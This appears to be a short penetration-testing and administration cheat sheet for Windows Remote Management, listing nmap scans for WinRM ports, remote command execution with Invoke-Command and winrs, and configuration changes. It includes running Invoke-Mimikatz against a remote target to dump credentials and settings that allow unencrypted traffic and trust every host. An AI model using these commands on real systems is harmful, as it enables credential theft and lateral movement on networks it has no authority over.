Windows Remote Management

Tips#

apk add nmap-scripts nmap-nselibs
nmap -p 5985,5986 -sV 192.168.0.0/24
Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET
Enable-PSRemoting -Force
winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
Set-Item WSMan:localhost\client\trustedhosts -value *

winrm enumerate winrm/config/Listener

winrm quickconfig -transport:http

winrm e winrm/config/listener
# 远程执行
winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"